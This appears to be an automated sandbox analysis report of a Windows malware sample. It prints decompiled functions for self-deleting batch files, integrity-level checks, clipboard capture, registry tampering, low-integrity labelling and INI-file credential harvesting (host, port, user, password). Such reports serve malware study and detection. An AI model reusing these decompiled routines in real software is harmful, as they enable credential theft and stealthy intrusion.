Part of subcall function 0041B5DA: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B617
Part of subcall function 0041B5DA: CloseHandle.KERNEL32(00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B624

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F95

Strings

/c "%s", xrefs: 00417F67
bat, xrefs: 00417EF1
@echo off%sdel /F "%s", xrefs: 00417F24
ComSpec, xrefs: 00417F90

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 004ba48598160e4ac23387e20f8d9040b2b3c6233c20d5384048c89fa89ca8dd
Instruction ID: d2527249bbee34bb5c6be1fa124756877380e8bd3387bb81f4f3decc171b221b
Opcode Fuzzy Hash: 004ba48598160e4ac23387e20f8d9040b2b3c6233c20d5384048c89fa89ca8dd
Instruction Fuzzy Hash: 992171B19451086ADB10DBA5DC46FEF77BCEF44314F204167F608E2191EA789BC68B68

Uniqueness

Uniqueness Score: -1.00%

Function 00417B75, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00417B75(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E004163F1(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E00416421(_t32);
					goto L12;
				}
			}

0x00417b83
0x00417b8d
0x00417c23
0x00417c27
0x00417c27
0x00417ba9
0x00417c19
0x00417c1c
0x00000000
0x00417bb6
0x00417bbf
0x00417bc3
0x00417c18
0x00000000
0x00417c18
0x00417bd6
0x00417bda
0x00417be2
0x00417be4
0x00417be8
0x00417bf1
0x00417bf9
0x00417c02
0x00417c0d
0x00417c0f
0x00417c04
0x00417c04
0x00417c04
0x00417c02
0x00417bf9
0x00417be8
0x00417be2
0x00417c13
0x00000000
0x00417c13

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417B85
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BA5
GetLastError.KERNEL32(?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BAB
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BD2
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BDA
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BF1
CloseHandle.KERNEL32(?,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417C1C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: bce2b1f989a1d21d6e703f37d3047af5bc0e565e9cf843ffb1f5230efbe2075c
Instruction ID: e2cdd288235fb1fe3f4f6663042c3c76a219e2f521f445cde77449fcbae1e455
Opcode Fuzzy Hash: bce2b1f989a1d21d6e703f37d3047af5bc0e565e9cf843ffb1f5230efbe2075c
Instruction Fuzzy Hash: C911B175604048EFEB105B90DD84EEE3BBEEB05390F100876F640E6160E7358EC5A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 004162F5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004162F5(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E004068C0() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E00416661(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x423148);
							E00415FF2(0x4048b0);
							E00415FF2(_t24);
							LeaveCriticalSection(0x423148);
							if(_t24 != _t21) {
								E00416421(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x004162f9
0x00416304
0x00416306
0x00416310
0x00000000
0x00416312
0x0041631b
0x004163a3
0x00000000
0x00416330
0x00416338
0x0041633c
0x004163a2
0x00000000
0x004163a2
0x00416340
0x00416341
0x00416360
0x00416361
0x00416354
0x0041635c
0x00416368
0x0041636a
0x00416372
0x0041637d
0x00416383
0x00416389
0x00416391
0x00416394
0x00416394
0x00416391
0x0041639c
0x00000000
0x0041639c
0x00416343
0x00416346
0x00416351
0x00416352
0x00000000
0x00416352
0x0041634b
0x00416365
0x0041634d
0x0041634d
0x0041634d
0x00000000
0x0041634b

APIs

GetClipboardData.USER32 ref: 004162FE

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

GlobalLock.KERNEL32 ref: 00416332
EnterCriticalSection.KERNEL32(00423148,00000000,00000000), ref: 00416372
LeaveCriticalSection.KERNEL32(00423148,00000000,004048B0), ref: 00416389
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0041639C

Strings

H1B, xrefs: 0041636C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID: H1B
API String ID: 1109978993-3745981028
Opcode ID: 8925f79ae8d16de863e2a3d3bb42d82ef38032500c08bad59b2523f3f44fc476
Instruction ID: 6e03cb95158d279f861de92ac889b245dd150b0da374fe5ec4618d5a8931013f
Opcode Fuzzy Hash: 8925f79ae8d16de863e2a3d3bb42d82ef38032500c08bad59b2523f3f44fc476
Instruction Fuzzy Hash: 2411363710011DA7CB112E6999849FF36589B85761B1B803BFE28E7350CB3DCDC292AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A93B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A93B(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0041A7A0(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x0041a960
0x0041a963
0x0041a965
0x0041a967
0x0041a970
0x0041a973
0x0041a97c
0x0041a999
0x00000000
0x0041a99b
0x0041a99e
0x0041a9a4
0x0041a9b1
0x00000000
0x00000000
0x00000000
0x0041a9a4
0x0041a9b5
0x0041a9b8
0x00000000
0x0041a9a6
0x0041a9a6
0x0041a9a9
0x00000000
0x0041a9af
0x0041a9bb
0x0041a9c1

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0041A963

Part of subcall function 0041A7A0: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A8C1

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0041A995
RegCloseKey.ADVAPI32(?), ref: 0041A99E
RegCloseKey.ADVAPI32(?), ref: 0041A9B8

Strings

d, xrefs: 0041A9A9
SOFTWARE\Microsoft, xrefs: 0041A956

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: f87a447489ce9b4e0618304390e8080099b321078ab76f4e1a3ff904a8be020a
Instruction ID: e3738e24e1d9ab8f44b10df7595de004fbfcb88025abaffe2bc1b40fe986c47c
Opcode Fuzzy Hash: f87a447489ce9b4e0618304390e8080099b321078ab76f4e1a3ff904a8be020a
Instruction Fuzzy Hash: 23115EB590120CBEEB019B948C81EEFBB7CEB44388F114466FA0172151D2759E958B7A

Uniqueness

Uniqueness Score: -1.00%

Function 00419AA2, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00419AA2(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E00417AED(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x00419aae
0x00419ab0
0x00419ab6
0x00419ac1
0x00419ac9
0x00419ada
0x00419add
0x00419ae5
0x00419af4
0x00419afc
0x00419afe
0x00419afe
0x00419afc
0x00419b03
0x00419b03
0x00419b0d

APIs

Part of subcall function 00417AED: GetCurrentThread.KERNEL32 ref: 00417AFD
Part of subcall function 00417AED: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B04
Part of subcall function 00417AED: OpenProcessToken.ADVAPI32(000000FF,00000020,0040E7CE,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B16

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00419AC1
GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 00419ADD
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 00419AF4
LocalFree.KERNEL32(?), ref: 00419B03

Strings

SeSecurityPrivilege, xrefs: 00419AA9
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00419ABC

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 7e361b9ed55d4d2efd85c6a056c312ce8036b60ea4264fa61bac2ab058613b5f
Instruction ID: 0d5a7cff9204bc65e3871225ef8784af8471197b60ca19cc1ac964c1f3b86b6a
Opcode Fuzzy Hash: 7e361b9ed55d4d2efd85c6a056c312ce8036b60ea4264fa61bac2ab058613b5f
Instruction Fuzzy Hash: E3013CB564020CBFEB119FA09D85FEF7B7CEB04784F000066F602F11A0E675AE94DA68

Uniqueness

Uniqueness Score: -1.00%

Function 004077F4, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004077F4(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E00407715(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E00407585(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E00407585(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E004083E4(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E00407715(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x004077f4
0x004077f7
0x004077fb
0x004077fe
0x00407806
0x00407823
0x0040782b
0x00000000
0x00000000
0x0040782d
0x00407848
0x00407850
0x00407866
0x00000000
0x00000000
0x00000000
0x00000000
0x0040786c
0x0040786c
0x0040786c
0x00407882
0x0040788a
0x00407891
0x004078bc
0x004078c1
0x004078c4
0x004078c7
0x004079de
0x004079e1
0x00407a26
0x00407a2b
0x00407a56
0x00407a5b
0x00407975
0x00407979
0x00407979
0x00407a61
0x00407a63
0x00407a63
0x00407a66
0x00000000
0x00000000
0x00407a6c
0x00407a6f
0x00407964
0x00407964
0x0040796a
0x0040796b
0x00407970
0x00407973
0x00000000
0x00407973
0x00407a75
0x00407a75
0x00407a78
0x00407a7b
0x00000000
0x00407a7b
0x00407a30
0x00407a33
0x00407a38
0x00000000
0x00000000
0x00407a45
0x00407a51
0x00000000
0x00407a51
0x004079e3
0x00407932
0x00407932
0x00407935
0x004078b0
0x004078b0
0x00000000
0x004078b0
0x004079e9
0x004079ec
0x004079a0
0x004079a0
0x004079a5
0x004079b9
0x004079b9
0x00000000
0x004079a5
0x004079ee
0x004079f1
0x00407a11
0x00407a16
0x0040790a
0x0040790a
0x0040790f
0x0040790f
0x00000000
0x00000000
0x00000000
0x00407911
0x0040795f
0x0040795f
0x00000000
0x0040795f
0x004079f3
0x004079f6
0x00000000
0x00000000
0x004079fc
0x00407a01
0x00000000
0x00000000
0x00407a07
0x00000000
0x00407a07
0x004078cd
0x004079c0
0x004079c5
0x00000000
0x00000000
0x004079cb
0x004079ce
0x004079d5
0x00000000
0x00000000
0x004079d7
0x00000000
0x004079d7
0x004078d3
0x004078d6
0x0040798e
0x00407993
0x00000000
0x00000000
0x00407995
0x0040799a
0x00000000
0x00000000
0x00000000
0x0040799a
0x004078dc
0x004078df
0x00407958
0x0040795d
0x0040797c
0x00407981
0x00000000
0x00000000
0x00407987
0x00000000
0x00407987
0x00000000
0x0040795d
0x004078e1
0x004078e4
0x0040793b
0x00407940
0x0040794b
0x00407950
0x00000000
0x00000000
0x00407952
0x00407954
0x00407946
0x00407946
0x00000000
0x00407946
0x00407942
0x00407944
0x00000000
0x00407944
0x004078e9
0x004078ec
0x00000000
0x00000000
0x004078ee
0x004078f3
0x00407927
0x0040792c
0x0040792f
0x00000000
0x0040792f
0x004078f5
0x004078fa
0x00000000
0x00000000
0x004078fc
0x00407901
0x00000000
0x00000000
0x00407903
0x00407908
0x00000000
0x00000000
0x00000000
0x00407908
0x00407899
0x0040789e
0x004078a4
0x004078ab
0x00000000
0x004078ab

APIs

GetAncestor.USER32(?,00000002), ref: 0040781D
SendMessageTimeoutW.USER32 ref: 00407848
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040788A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00407920
PostMessageW.USER32(?,00000112,?,?), ref: 00407973
GetWindowThreadProcessId.USER32(?,00000000), ref: 004079B2

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: d10eeb8b160b5209b332f052e9ce65faab0a862498f70623044e3137c689ab0a
Instruction ID: 5723f23ea4cd824f7c706b940b28baf035dbc1d0dc1771281f15a2580d02225a
Opcode Fuzzy Hash: d10eeb8b160b5209b332f052e9ce65faab0a862498f70623044e3137c689ab0a
Instruction Fuzzy Hash: F1517DB1E08309AAFF315A29CC85FBE3624EB05350F244533F981B62E1C27DE991D65B

Uniqueness

Uniqueness Score: -1.00%

Function 00413F55, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00413F55(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E0041BCB4( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E004163F1(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E00416421(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E004172D1(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E004163F1(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E004159A4(_t61,  &_v584);
						_t63 = 0x73;
						E004159A4(_t63,  &_v596);
						_t65 = 0x74;
						E004159A4(_t65,  &_v608);
						_t67 = 0x75;
						E004159A4(_t67,  &_v624);
						_t69 = 0x76;
						E004159A4(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E0041730D(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E00416F70(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E004159A4(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E00417114(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E00416815(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E00416421(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E00413F1D(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x00413f5b
0x00413f79
0x0041416f
0x00414177
0x00414177
0x00413f7f
0x00413f82
0x00413fa3
0x00413fa7
0x00413fab
0x00413fad
0x00000000
0x00000000
0x00413fca
0x00413fcc
0x00413fce
0x00414169
0x0041416a
0x00000000
0x0041416a
0x00413fd4
0x00413fd9
0x00413fde
0x00413fe0
0x00000000
0x00000000
0x00413ff0
0x00413ff2
0x00413ff6
0x00413ff8
0x00413ffe
0x00414006
0x0041400a
0x00414012
0x00414013
0x0041401e
0x0041401f
0x0041402a
0x0041402b
0x00414036
0x00414037
0x00414042
0x00414043
0x00414048
0x00414145
0x0041414b
0x00414150
0x00414154
0x00414156
0x0041404a
0x0041404e
0x00414057
0x0041405d
0x0041405f
0x0041407f
0x00414081
0x00414083
0x0041409c
0x004140a2
0x004140a7
0x004140ac
0x004140bb
0x004140cd
0x004140cf
0x004140d1
0x004140dc
0x004140dc
0x004140ee
0x004140f0
0x004140f2
0x004140f6
0x004140fb
0x004140fd
0x00414101
0x00414105
0x00414106
0x0041410b
0x0041410f
0x00414115
0x0041411f
0x00414120
0x00414127
0x0041412c
0x0041412f
0x00414131
0x00414133
0x00414139
0x0041413e
0x00414140
0x00414142
0x00414142
0x00414142
0x00414142
0x00414140
0x00414131
0x004140fd
0x004140f2
0x004140d1
0x004140ac
0x00414083
0x00000000
0x0041405f
0x00414160
0x00414165
0x00414165
0x00000000
0x00413f84
0x00413f8f
0x00000000
0x00413f8f

APIs

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

GetPrivateProfileStringW.KERNEL32 ref: 00413FCA
StrStrIW.SHLWAPI(?,?), ref: 00414057
GetPrivateProfileStringW.KERNEL32 ref: 0041407F
GetPrivateProfileIntW.KERNEL32 ref: 0041409C
GetPrivateProfileStringW.KERNEL32 ref: 004140CD

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

